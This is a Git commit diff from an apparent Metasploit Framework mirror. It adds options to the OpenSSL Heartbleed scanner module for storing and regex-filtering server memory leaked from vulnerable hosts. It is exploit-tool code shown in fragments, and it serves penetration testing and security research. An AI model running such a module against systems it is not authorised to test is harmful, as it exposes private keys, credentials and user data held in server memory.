infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #3232, Heartbleed memory dump filtering

bug/bundler_fix
William Vu 2014-04-11 12:46:01 -05:00
parent b69662fa42 a63f020a68
commit 6599999b8a
No known key found for this signature in database
GPG Key ID: E761DCB4C1629024
1 changed files with 22 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
modules/auxiliary/scanner/ssl/openssl_heartbleed.rb
View File

@ -100,7 +100,8 @@ class Metasploit3 < Msf::Auxiliary
'FiloSottile', # PoC site and tool 'FiloSottile', # PoC site and tool
'Christian Mehlmauer', # Msf module 'Christian Mehlmauer', # Msf module
'wvu', # Msf module 'wvu', # Msf module
'juan vazquez' # Msf module 'juan vazquez', # Msf module
'Sebastiano Di Paola' # Msf module
], ],
'References' => 'References' =>
[ [
@ -120,7 +121,9 @@ class Metasploit3 < Msf::Auxiliary
[ [
Opt::RPORT(443), Opt::RPORT(443),
OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]), OptEnum.new('STARTTLS', [true, 'Protocol to use with STARTTLS, None to avoid STARTTLS ', 'None', [ 'None', 'SMTP', 'IMAP', 'JABBER', 'POP3', 'FTP' ]]),
OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']]) OptEnum.new('TLSVERSION', [true, 'TLS version to use', '1.0', ['1.0', '1.1', '1.2']]),
OptBool.new('STOREDUMP', [true, 'Store leaked memory in a file', false]),
OptRegexp.new('DUMPFILTER', [false, 'Pattern to filter leaked memory before storing', nil])
], self.class) ], self.class)
register_advanced_options( register_advanced_options(
@ -291,16 +294,24 @@ class Metasploit3 < Msf::Auxiliary
:refs => self.references, :refs => self.references,
:info => "Module #{self.fullname} successfully leaked info" :info => "Module #{self.fullname} successfully leaked info"
}) })
path = store_loot( if datastore['STOREDUMP']
"openssl.heartbleed.server", pattern = datastore['DUMPFILTER']
"application/octet-stream", if pattern
ip, match_data = heartbeat_data.scan(pattern).join
heartbeat_data, else
nil, match_data = heartbeat_data
"OpenSSL Heartbleed server memory" end
) path = store_loot(
"openssl.heartbleed.server",
"application/octet-stream",
ip,
match_data,
nil,
"OpenSSL Heartbleed server memory"
)
print_status("#{peer} - Heartbeat data stored in #{path}")
end
vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}") vprint_status("#{peer} - Printable info leaked: #{heartbeat_data.gsub(/[^[:print:]]/, '')}")
print_status("#{peer} - Heartbeat data stored in #{path}")
else else
vprint_error("#{peer} - Looks like there isn't leaked information...") vprint_error("#{peer} - Looks like there isn't leaked information...")
end end